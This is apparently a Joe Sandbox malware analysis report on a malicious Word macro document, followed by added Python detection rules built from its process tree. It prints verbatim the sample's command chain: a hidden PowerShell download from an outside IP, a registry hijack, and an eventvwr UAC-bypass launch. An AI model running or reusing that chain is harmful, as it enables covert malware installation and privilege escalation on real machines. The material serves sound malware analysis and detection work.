Joe Sandbox Analysis Report
ID: 34930
Sample Name: sample1.doc
Cookbook: defaultwindowsofficecookbook.jbs
Time: 21:46:35
Date: 23/10/2017
Version: 20.0.0
Copyright Joe Security LLC 2017

Table of Contents
- Analysis Report
  - Overview: General Information; Detection; Confidence; Classification; Analysis Advice
  - Signature Overview: AV Detection; Key, Mouse, Clipboard, Microphone and Screen Capturing; Software Vulnerabilities; Networking; Persistence and Installation Behavior; Data Obfuscation; Spreading; System Summary; HIPS / PFW / Operating System Protection Evasion; Anti Debugging; Malware Analysis System Evasion; Hooking and other Techniques for Hiding and Protection; Language, Device and Operating System Detection
  - Behavior Graph
  - Simulations: Behavior and APIs
  - Antivirus Detection: Initial Sample; Dropped Files; Domains
  - Yara Overview: Initial Sample; PCAP (Network Traffic); Dropped Files; Memory Dumps; Unpacked PEs
  - Joe Sandbox View / Context: IPs; Domains; ASN; Dropped Files
  - Screenshot
  - Startup
  - Created / dropped Files
  - Contacted Domains/Contacted IPs: Contacted Domains; Contacted IPs
  - Static File Info: General; File Icon
  - Static OLE Info: General; OLE File "sample1.doc" (Indicators; Summary; Document Summary); Streams with VBA (Module1.bas, Stream Size 3467; ThisDocument.cls, Stream Size 12841); Streams (\x1CompObj; \x5DocumentSummaryInformation; \x5SummaryInformation; 1Table; Data; Macros/PROJECT; Macros/PROJECTwm; Macros/VBA/_VBA_PROJECT; Macros/VBA/dir; WordDocument)
  - Network Behavior: TCP Packets; HTTP Request Dependency Graph; HTTP Packets
  - Code Manipulations
  - Statistics
  - Behavior: System Behavior, one Analysis Process entry each (General, File Activities, Registry Activities where present) for WINWORD.EXE (PID 3100, Parent PID 2840), cmd.exe (PID 3168, Parent PID 3100), powershell.exe (PID 3204, Parent PID 3168), reg.exe (PID 3276, Parent PID 3168), eventvwr.exe (PID 3284, Parent PID 3168), mmc.exe (PID 3304, Parent PID 3284) and PING.EXE (PID 3384, Parent PID 3168)
  - Disassembly: Code Analysis
Analysis Report
Overview
General Information
Joe Sandbox Version: 20.0.0
Analysis ID: 34930
Start time: 21:46:35
Start date: 23.10.2017
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 26s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: sample1.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Run name: without instrumentation
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled
Detection: MAL
Classification: mal92.evad.expl.troj.winDOC@13/10@0/1
HCA Information: Successful, ratio: 100%; Number of executed functions: 0; Number of non-executed functions: 0
EGA Information: Failed
HDC Information: Failed
Cookbook Comments: Found application associated with file extension: .doc; Found Word or Excel or PowerPoint document; Simulate clicks; Number of clicks 13; Close Viewer
Warnings:
- Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
- Report size getting too big, too many NtAllocateVirtualMemory calls found.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtEnumerateValueKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe, mmc.exe
Detection
Strategy: Threshold
Score: 92
Range: 0 - 100
Reporting: Report FP / FN
Confidence
Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false
Classification
Classification chart (rendered figure; only its labels are recoverable): categories Ransomware, Evader, Spreading, Exploiter, Phishing, Spyware, Banker, Adware and Trojan / Bot, each rated on a malicious / suspicious / clean scale. The classification string in General Information, mal92.evad.expl.troj.winDOC@13/10@0/1, encodes the same verdict: malicious with score 92, with the Evader, Exploiter and Trojan categories set.
Analysis Advice
All HTTP requests made by the sample target non-existent resources (HTTP 404), so the sample is likely no longer working.
The sample has a GUI, but Joe Sandbox found no clickable buttons; more UI automation may extend the observed behavior.
Signature Overview
• AV Detection
• Key, Mouse, Clipboard, Microphone and Screen Capturing
• Software Vulnerabilities
• Networking
• Persistence and Installation Behavior
• Data Obfuscation
• Spreading
• System Summary
• HIPS / PFW / Operating System Protection Evasion
• Anti Debugging
• Malware Analysis System Evasion
• Hooking and other Techniques for Hiding and Protection
• Language, Device and Operating System Detection
AV Detection:
Antivirus detection for submitted file
Key, Mouse, Clipboard, Microphone and Screen Capturing:
Creates a window with clipboard capturing capabilities
Software Vulnerabilities:
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Document exploit detected (process start blacklist hit)
Networking:
Downloads files
Downloads files from webservers via HTTP
Tries to download non-existing http data (HTTP/1.1 404 Not Found)
Urls found in memory or binary data
HTTP GET or POST without a user agent
Uses ping.exe to check the status of other devices and networks
Persistence and Installation Behavior:
Tries to download and execute files (via powershell)
Data Obfuscation:
Powershell starts a process from the temp directory
Suspicious powershell command line found
Spreading:
Enumerates the file system
System Summary:
Checks whether correct version of .NET is installed
Executable creates window controls seldom found in malware
Found graphical window changes (likely an installer)
Uses Microsoft Silverlight
Checks if Microsoft Office is installed
Uses new MSVCR Dlls
Binary contains paths to debug symbols
Binary contains paths to development resources
Classification label
Creates files inside the user directory
Creates temporary files
Document contains an OLE Word Document stream indicating a Microsoft Word file
Document contains summary information with irregular field values
Found command line output
Parts of this applications are using the .NET runtime (Probably coded in C#)
Reads ini files
Reads software policies
Sample is known by Antivirus (Virustotal or Metascan)
Spawns processes
Uses an in-process (OLE) Automation server
Creates mutexes
Document contains embedded VBA macros
Enables security privileges
Uses reg.exe to modify the Windows registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
HIPS / PFW / Operating System Protection Evasion:
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Bypasses PowerShell execution policy
Anti Debugging:
Creates guard pages, often used to prevent reverse engineering and debugging
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Enables debug privileges
Malware Analysis System Evasion:
Queries a list of all running processes
Contains long sleeps (>= 3 min)
Enumerates the file system
May sleep (evasive loops) to hinder dynamic analysis
Uses ping.exe to sleep
Hooking and other Techniques for Hiding and Protection:
Disables application error messages (SetErrorMode)
Document contains OLE streams with high entropy indicating encrypted embedded content
System process connects to network (likely due to code injection or exploit)
Language, Device and Operating System Detection:
Queries the cryptographic machine GUID
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Behavior Graph
Behavior graph (rendered figure; only the labels are recoverable)
ID: 34930, Sample: sample1.doc, Startdate: 23/10/2017, Architecture: WINDOWS, Score: 92
Legend: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious
Process tree as drawn:
  WINWORD.EXE (counts shown: 55, 24) started cmd.exe [Document exploit detected (process start blacklist hit)]
  cmd.exe started powershell.exe, eventvwr.exe and reg.exe (counts shown: 12, 7, 1) [Powershell starts a process from the temp directory; Suspicious powershell command line found; Tries to download and execute files (via powershell)]; "Processes exceeded maximum capacity for this level. 1 process has been hidden."
  eventvwr.exe started mmc.exe (counts shown: 2, 26)
  DNS/IP node: 176.123.10.55, port 80 (AXAUTSYSRepublicofMoldovaMD, Moldova Republic of)
  Signature attached to the network edge: System process connects to network (likely due to code injection or exploit)
The numeric counts are the graph's created-registry-values / created-files figures; which count belongs to which of the three cmd.exe children is not recoverable from the extracted figure.
Simulations
Behavior and APIs
Time | Type | Description
21:47:15 | API Interceptor | 1x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms
21:47:23 | API Interceptor | 5x Sleep call for process: mmc.exe modified from: 60000ms to: 500ms
Antivirus Detection
Initial Sample
Source | Detection | Cloud Link
sample1.doc | 57% | virustotal
sample1.doc | 24% | metadefender
Dropped Files
No Antivirus matches
Domains
No Antivirus matches
Yara Overview
Initial Sample
No yara matches
PCAP (Network Traffic)
No yara matches
Dropped Files
No yara matches
Memory Dumps
No yara matches
Unpacked PEs
No yara matches
Joe Sandbox View / Context
IPs
Match | Associated Sample Name / URL | SHA 256 | Detection | Context
176.123.10.55 | sample1.doc | 48e78235a9858fd85e3bcb330b7abcf5b9b67d9c39a7c439f2b30c82881224d9 | malicious |
Domains
No context
ASN
Match | Associated Sample Name / URL | SHA 256 | Detection | Context
AXAUTSYSRepublicofMoldovaMD | sample1.doc | 48e78235a9858fd85e3bcb330b7abcf5b9b67d9c39a7c439f2b30c82881224d9 | malicious | 176.123.10.55
Dropped Files
No context
Screenshot
Startup
System is w7
WINWORD.EXE (PID: 3100) cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\sample1.doc' MD5: 5D798FF0BE2A8970D932568068ACFD9D
cmd.exe (PID: 3168) cmdline: 'C:\Windows\System32\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://176.123.10.55/update.x','C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe') & reg add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe /f & eventvwr.exe & PING -n 15 127.0.0.1>nul & C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe MD5: AD7B9C14083B52BC532FBA5948342B98
powershell.exe (PID: 3204) cmdline: powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://176.123.10.55/update.x', 'C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe') MD5: 92F44E405DB16AC55D97E3BFE3B132FA
reg.exe (PID: 3276) cmdline: reg add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe /f MD5: D69A9ABBB0D795F21995C2F48C1EB560
eventvwr.exe (PID: 3284) cmdline: eventvwr.exe MD5: 91415D7EB992B77410145DD5FE453D25
mmc.exe (PID: 3304) cmdline: 'C:\Windows\system32\mmc.exe' 'C:\Windows\system32\eventvwr.msc' MD5: 6AAF3BECE2C3D17091BCEF37C5A82AC0
PING.EXE (PID: 3384) cmdline: PING -n 15 127.0.0.1 MD5: 6242E3D67787CCBF4E06AD2982853144
cleanup
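The whole infection sequence sits in the single cmd.exe command line above: PowerShell (hidden window, no profile, execution policy bypassed) downloads update.x to %TEMP%\sdgfusde.exe; reg.exe points HKCU\Software\Classes\mscfile\shell\open\command at that file; eventvwr.exe is launched, which opens eventvwr.msc through mmc.exe and resolves the .msc handler via that per-user key, so the hijacked command runs under the auto-elevated Event Viewer (a known UAC bypass); PING -n 15 127.0.0.1 pauses roughly 14 s for the download to land; finally the dropped executable is started directly. In this run the download returned 404 (see Networking), so the last stage never executed. The Python below is an added example, not report output or Joe Sandbox code: it turns these observations into detection rules over a process tree. The PROCESSES records are transcribed from the Startup section; the rule names are the example's own.

```python
"""Detection rules for the macro -> cmd.exe -> PowerShell/reg/eventvwr chain.

Added example: PROCESSES is transcribed from the report's Startup section
(PIDs, parents, command lines); nothing here was produced by the sample.
"""
import re

PROCESSES = [
    {"pid": 3100, "ppid": 2840, "image": "WINWORD.EXE",
     "cmdline": r"'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\sample1.doc'"},
    {"pid": 3168, "ppid": 3100, "image": "cmd.exe",
     "cmdline": r"'C:\Windows\System32\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass "
                r"(New-Object System.Net.WebClient).DownloadFile('http://176.123.10.55/update.x',"
                r"'C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe') & reg add "
                r"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d "
                r"C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe /f & eventvwr.exe & "
                r"PING -n 15 127.0.0.1>nul & C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe"},
    {"pid": 3204, "ppid": 3168, "image": "powershell.exe",
     "cmdline": r"powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient)"
                r".DownloadFile('http://176.123.10.55/update.x', 'C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe')"},
    {"pid": 3276, "ppid": 3168, "image": "reg.exe",
     "cmdline": r"reg add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe /f"},
    {"pid": 3284, "ppid": 3168, "image": "eventvwr.exe", "cmdline": "eventvwr.exe"},
    {"pid": 3304, "ppid": 3284, "image": "mmc.exe",
     "cmdline": r"'C:\Windows\system32\mmc.exe' 'C:\Windows\system32\eventvwr.msc'"},
    {"pid": 3384, "ppid": 3168, "image": "PING.EXE", "cmdline": "PING -n 15 127.0.0.1"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# The per-user .msc handler that an auto-elevated eventvwr.exe/mmc.exe honours.
MSCFILE_KEY = re.compile(r"hkcu\\+software\\+classes\\+mscfile\\+shell\\+open\\+command", re.I)
URL_RE = re.compile(r"https?://[^\s'\"),]+", re.I)
PING_RE = re.compile(r"\bping(?:\.exe)?\s+-n\s+(\d+)\s+127\.0\.0\.1", re.I)
CRADLE_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|invoke-expression|\biwr\b|\biex\b", re.I)


def analyse(procs):
    """Return (rule, pid, detail) findings for a list of process records."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    hijack_seen = False          # a reg.exe write to the mscfile handler was observed earlier
    for p in procs:              # records are in start order, as in the report
        img, cmd = p["image"].lower(), p["cmdline"]
        parent = by_pid.get(p["ppid"])
        parent_img = parent["image"].lower() if parent else ""
        if parent_img in OFFICE_APPS and img in SHELLS:
            findings.append(("office_spawns_shell", p["pid"], f"{parent_img} -> {img}"))
        if img == "powershell.exe":
            hidden = re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I)
            bypass = re.search(r"-e(?:p|xecutionpolicy)\s+bypass", cmd, re.I)
            if hidden and bypass:
                findings.append(("powershell_hidden_bypass", p["pid"], "-w hidden -ep bypass"))
            if CRADLE_RE.search(cmd):
                findings.append(("powershell_download_cradle", p["pid"], ",".join(URL_RE.findall(cmd))))
        if img == "reg.exe" and MSCFILE_KEY.search(cmd):
            m = re.search(r"/d\s+(\S+)", cmd)
            hijack_seen = True
            findings.append(("mscfile_handler_hijack", p["pid"], m.group(1) if m else ""))
        if img == "eventvwr.exe" and parent_img in SHELLS and hijack_seen:
            findings.append(("eventvwr_uac_bypass", p["pid"], "mscfile handler set, then eventvwr.exe from a shell"))
        m = PING_RE.search(cmd)
        if m and img.startswith("ping") and int(m.group(1)) >= 5:
            # ping sends one echo per second, so -n N waits about N-1 seconds
            findings.append(("ping_sleep", p["pid"], f"~{int(m.group(1)) - 1}s delay"))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyse(PROCESSES):
        print(f"{rule:28s} pid={pid} {detail}")
```

The rules are deliberately tied to the parent/child edges the sandbox recorded rather than to the long cmd.exe line alone: the same chain typed by an administrator from an interactive console would not trip office_spawns_shell, and the mscfile write by itself is ambiguous until eventvwr.exe follows it from the same shell. On a live host the equivalent check is whether HKCU\Software\Classes\mscfile\shell\open\command exists at all; Windows does not create that per-user key.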
Created / dropped Files
C:\Users\user\AppData\Local\Microsoft\Event Viewer\RecentViews
  File Type: TrueType font data
  MD5: D41D8CD98F00B204E9800998ECF8427E
  SHA1: 71AAB53EA530B694914037520A825D553CAA0928
  SHA-256: 5607B57C3C58070F54B8F68FA22808F9AD14C60BBF05F00DA92A162585C3C562
  SHA-512: 6710BB3D2CC4C560E57E0D087FA369FE1E43E537E178E5EBC417871B1A09BEABC471D5CD1BABCAF260A82563CBFB7B38903C46C3B4C211550D7365138214551C
  Malicious: false
C:\Users\user\AppData\Local\Microsoft\Event Viewer\Settings.Xml
  File Type: ASCII text, with no line terminators
  MD5: D41D8CD98F00B204E9800998ECF8427E
  SHA1: 102E8A8F3C91A10D9D670E0B3715BD2E0ACEE5FF
  SHA-256: 50FD9D76D1C43BB16B166DE02AAF8ADEC09EB5BC4CEFDCA9D1AF2E0F7B1D8F64
  SHA-512: B815FCBD7263B6667F01478B955F9734B1BDDBCD7CA8E62EF8FF1EC46ED99931BA466C976AC781F1BD899125571585D580F6F232CC37B8E9ED87935981B99B78
  Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF1634D7-9184-4F30-9FCD-F94560163471}.tmp
  File Type: FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
  MD5: D41D8CD98F00B204E9800998ECF8427E
  SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
  SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
  SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
  Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\MMC\eventvwr
  File Type: XML document text
  MD5: D41D8CD98F00B204E9800998ECF8427E
  SHA1: 34E5E6A1AFAE83241F26443BB5F0E9DAC44E42C1
  SHA-256: EDFCB26CE73F3BFA4AB029A4FF1945D5A87847CBF9586F4746D091D0FCDBE2CB
  SHA-512: 331601C40D1999DA2A243E1EF416FF2A74BECB002A4D94ABBAFD531F078F074E7EF427B820A30E95BE594228B02E10E5D6B89BF45CDF27F29E0F7679FB45D4F3
  Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
  File Type: ASCII text, with CRLF line terminators
  MD5: D41D8CD98F00B204E9800998ECF8427E
  SHA1: B1818576508D2F3C35AECC500B353008D62B096F
  SHA-256: F1017C4BD49589EB596E205043AE1B800094CE39E4896E0DBA2A617055851B55
  SHA-512: F65EC14399FDCA10E6CB458E66326BF12B4FF2B2E6C3EFE7E1C32F84E204612E178E24F19A07715A1918C8FCA156A00377274B14655017D80F7D4669F384EED4
  Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample1.LNK
  File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 13:59:02 2017, mtime=Sun Sep 24 13:59:02 2017, atime=Mon Oct 23 19:47:13 2017, length=156160, window=hide
  MD5: D41D8CD98F00B204E9800998ECF8427E
  SHA1: E4AC98B24D183AD2662B68A34EEDFC0D46F2B617
  SHA-256: 25DD09AF910FCDD26D6C66823961A54AF5D5A963B50AFA9711CA9401C561388A
  SHA-512: 116B7825F21C4138A0A33AF8CE3BE2E636323DFCCA9F464C79D1772C42A972B2E996F0349C06634DDD527EB722644C1F57BF584B98238E68729405122607A022
  Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  File Type: data
  MD5: D41D8CD98F00B204E9800998ECF8427E
  SHA1: 9E647BCB57789C91D08C9B02D73ECD048239B5C5
  SHA-256: 08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36
  SHA-512: A4CCFF54304DBB44144FFF7EF0027A3DE88B66CBEE24158162D30BC8ED4E8A4D3476645E1F5B76F86BAADB18EF9867116F900B671F7951B5FCC39BABB319C5A2
  Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\92X7Z481N77J9BBRAJPZ.temp
  File Type: data
  MD5: D41D8CD98F00B204E9800998ECF8427E
  SHA1: 1FE83957C09773AB31E37807FB14C66C8FB814E7
  SHA-256: CB8F6F9045E05C7A7D93E7F097D0BA527B7A155C051A89F665A23CAAAC0111A5
  SHA-512: ACEAC11B5BA69EA5C4F4D1E0D7F5C8276CF0A5AFDD7F151BBCAA58B8B4CE5596F1C3EBAF051DC432DE792838C77D858D616150350F04D51DC1D943210F6A8E4C
  Malicious: false
C:\Users\user\Desktop\~$ample1.doc
  File Type: data
  MD5: D41D8CD98F00B204E9800998ECF8427E
  SHA1: 9E647BCB57789C91D08C9B02D73ECD048239B5C5
  SHA-256: 08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36
  SHA-512: A4CCFF54304DBB44144FFF7EF0027A3DE88B66CBEE24158162D30BC8ED4E8A4D3476645E1F5B76F86BAADB18EF9867116F900B671F7951B5FCC39BABB319C5A2
  Malicious: false
\Device\Null
  File Type: ASCII text, with CRLF line terminators
  MD5: D41D8CD98F00B204E9800998ECF8427E
  SHA1: C84D1FA1DB5682FDB58A1A6FCD3F36A8502A229A
  SHA-256: F447D7FA6F09356A388501C72EED61DE33EEF436CD0E0F4219CC0F4346964339
  SHA-512: 01627E41183BADD5F7FD257D16D4DFE35F30C4A967EA9EA30D9A78E868D33D9A0D05A4EAFF744A9AF38A9F0480C9835D1CED86883CA524F8A4F9E5E0D2E4019A
  Malicious: false
Contacted Domains/Contacted IPs
Contacted Domains
No contacted domains info
Contacted IPs
IP | Country | ASN | ASN Name | Malicious
176.123.10.55 | Moldova Republic of | 15836 | AXAUTSYSRepublicofMoldovaMD | true
Static File Info
General
File type: 0
TrID:
  Microsoft Word document (32009/1) 48.12%
  Microsoft Word document (old ver.) (19008/1) 28.57%
  Generic OLE2 / Multistream Compound File (8008/1) 12.04%
  Visual Basic Script (6000/0) 9.02%
  Java Script embedded in Visual Basic Script (1500/0) 2.25%
File name: sample1.doc
File size: 156160
MD5: 06c9328c0164523eeaf016d0c2bdab4d
SHA1: f3582f9fa404ca47f4f8f4a7f5241fa45689a9b8
SHA256: 48e78235a9858fd85e3bcb330b7abcf5b9b67d9c39a7c439f2b30c82881224d9
SHA512: 66c763e2fbde1bf94d42fa5cc3382f08a3e8181c3379acd697ace04f0a754223ca446583a313fd6c0a2894da63a704ff93178a043e2ade972450f81c24baa1ce
File Content Preview: ...... >......
File Icon
Static OLE Info
General
Document Type: OLE
Number of OLE Files: 1
OLE File "sample1.doc"
Indicators
Has Summary Info: True
Application Name: Microsoft Office Word
Encrypted Document: False
Contains Word Document Stream: True
Contains Workbook/Book Stream: False
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream: False
Flash Objects Count: 0
Contains VBA Macros: True
Summary
Code Page: 1252
Title:
Subject:
Author: User
Keywords:
Comments:
Template: Normal
Last Saved By: user
Revision Number: 4
Total Edit Time: 0
Create Time: 2017-01-20 00:05:00
Last Saved Time: 2017-02-21 02:29:00
Number of Pages: 1
Number of Words: 0
Number of Characters: 2
Creating Application: Microsoft Office Word
Security: 0
Document Summary
Document Code Page: 1252
Number of Lines: 1
Number of Paragraphs: 1
Thumbnail Scaling Desired: False
Company:
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 917504
Streams with VBA
VBA File Name: Module1.bas, Stream Size: 3467
General
Stream Path: Macros/VBA/Module1
VBA File Name: Module1.bas
Stream Size: 3467
Data ASCII: ...... H ; ...... x ...... M E ......
Data Raw: 01 16 01 00 00 f0 00 00 00 dc 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff e3 02 00 00 9f 09 00 00 00 00 00 00 01 00 00 00 d1 1c 48 3b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code Keywords
Keywords: 'choosesalt pledge "gvoozqvcgagcgoo" crashtrial VB_Name plateunit 'xhpitkjky handstable jbxaykeetysymgufg.Run(sfkcgtjrevbwrnwblsf, dollendless 'qcdtqntopnbkuymwe cottonliquid ownsecond "modifyolive" closeshare Function "kedmaatfrfotkgmsd" "bunkersyrup" cablemove hivfbwyoqfnxeonjhrp 'uqllilltmei "strongtruck" 'svnfkokzcvugwy "pevlzgbjpokk" "runsand" "iuadxkspm" coiltruly 'igcqavcjmhiboyv nvlwsxrcvuuf sfkcgtjrevbwrnwblsf, ktnrbptreiyxaadjenc dgenfjacueyheqqiox dbwszhxdnq ftulafwijjz assumefabric ktnrbptreiyxaadjenc) burdentopic 'airporteither becomeitem dveqaufcyblmxevof gqawrfnle 'gvlguivgr 'crseqohactn jbxaykeetysymgufg, 'dialfluid lbeaibupyfqaqxkfqat "zfxhuxxmuingtejzb" coilfunny 'xzmtpnevxixlz absurdbuild Attribute 'staytext dinneroriginal) mentionreason(dinneroriginal, "vyasvtgivzgbrtme" benefitinvite 'argueprogram mentionreason 'kfxqdugcacuqoieuun
VBA Code
VBA File Name: ThisDocument.cls, Stream Size: 12841
General
Stream Path: Macros/VBA/ThisDocument
VBA File Name: ThisDocument.cls
Stream Size: 12841
Data ASCII: ...... F ...... M . . . 9 ...... c ...... 0 . . U 0 . - E . ) . . S . . { . . S 5 . 4 . E . . . . . * ...... a . ` | o . H . . 4 J . k ...... x ...... M E ......
Data Raw: 01 16 01 00 00 00 01 00 00 46 04 00 00 e4 00 00 00 ea 01 00 00 ff ff ff ff 4d 04 00 00 39 20 00 00 00 00 00 00 01 00 00 00 d1 1c ea 63 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 30 c6 a9 55 30 94 2d 45 b0 29 dc 04 53 c7 09 7b b1 bd 53 35 81 34 f5 45 b4 a2 d0 aa da 2a 89 b7 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code Keywords
Keywords: 'daoqzcfhejetulopipf 'songspin shortwater "feelsunset" "maidsnow" bitteruniform "considermango" 'royalvolume 'shifttragic midnightpipe Public blushexplain "zgnihfkmhhd" 'meltrain cattlefoot "xmsbyyvodxkhjzjk" "bvlqhbeylvddn" omqjumyxr 'cqsvbyobkq ActiveDocument.Shapes.SelectAll 'addnetwork gatesponsor 'buyerdemise 'patslempjrypnok debrismeadow 'blessbulb Y/YcL zaqjysukrndll bsyixqsekpghdutrnl "vkzsslxsugrg" ZY-LwAJ 'tzahoeipjforwmdy qhrjjdwrroug Document_Open() oapuldmdkygm rozdrrbri, 'gafjsetjtvqjb cmqpihuzandngttgun 'yzboeyopqvucjxi "tkicoykbdam" vrjrxwzomczbkooi "zzqkprispegehi" dwarfreturn 'ecpmwktdqivwdsf False eggpeanut "LcZZmZdB.VZeALxAeBZ kvrgtoslkfpwuldalmo abstractsilver Mid(gatesponsor, "ellezwlycdrxohgd" "busyclient" yzljnoykmbrq 'ynsjvephmwpb 'amateurcrucial 'greatrule 'fgfyquryoavyauckleu 'kmlkxusssmqv nrzatmhxj cramextend arenatragic 'pioneerweather brickrough qdibdopids 'lkgnwyvzjnzszzrb itcwyqdpzzj 'vbzftwxepjitume qilmynflbayx 'dismissinner pzrocxrtpkbtwzqygln 'gifcgbspxaqylvqupte coraloutput() gridsyrup gpgjkaexexdviix taskview "ipt." 'lonvpicrisgxrxcyeeg "comicsimilar" 'jhqlbqabnaljtlou 'tbmpivbrjeki alsoother, rozdrrbri alsoother industryreport cigarspray 'almostretreat roastswing busytag indexrepair rajhobcwvwtvm 'yozouzaldrnlgeuqfmj "hzscxuezczrftedwex" "xrboczvbcwd" "aroundjoin" 'ghukxdlosmrioqcad spherestamp "ThisDocument" 'aunacvpiamodnob mlxgcercg 'nhjsnswwdeua 'rdjnwnhbhrqowzufm 'utkmitusnkkzdhuosk tojyqhtbps practiceprevent eiathpcnnvwrhf coyotehalf groceryhint 'hxvyyopevlrmodqg frequentfuture JhLiqqdZdYqeZLnLL 'qkkjipowvnjrz "exoticexpect" dividenurse ytrwhtddxmfqrafbtvg 'dreamsheriff 'ydtwxgyjx averageflock wszljijqltsjufs VB_Creatable rjrdvfmnotje arrangediscover VB_Exposed caughtminimum dzjehrnyjfmhjpuo endtennis LrqAeZgLA loovvcfmwwr 'pzittciniyawxc 'bamarkoqlcuwstyvzyl clutchfeel "wscr" bniufpymjhe 'canexist uxfnbvpqjpa 'feesetup nxobsppqyihqkjhktoy "cgpnjqcdmqzkbu" vighglysnqunompqy 'crimeicon canalsoccer 'vbstuxymbksohaxvz 'kwegjtyofyguqjy 'iyrvxzdhen modifyripple practiceprevent, 'claimwealth scripttaxi "meshspray" forgetprimary 'conductenter 'zsjcyvvmq Attribute cracofnqfisiv inmatevast 'gaugeslogan "shell" 'alsohabit effortinner 'afraidphoto VB_PredeclaredId VB_GlobalNameSpace 'aejotroiuqbo "mxsvryofao" boyequip dirbowfpohurs 'cubepayment VB_Name "analystdawn" 'customgate pzudvmfoetrdjzmqn besttuna "hoteltaxi" 'kpexmknsncopurilto 'ewvflehefksijsilejd 'mugwkovzkqqrpnguz coraloutput Function ourkxcdaygvhnguz "cruiseweapon" foammilk baqkeayrmbzpgovdu lgwldxbgzxolpuwgguq 'givepurchase 'clmafpjpsskatxvlgt "librarytask" Len(gatesponsor) broomtalk "pathsaddle" VB_Customizable glareneutral "maidroad" bmxvudvhvvvmgsyr Join(coconutfrost, "xadcuvgugsrdy" 'xaoheotlzteedwbymd "kuectfyfxfxeapwoc" fathabit VB_Base obeyvivid gazesort "habitusual" doveoccur 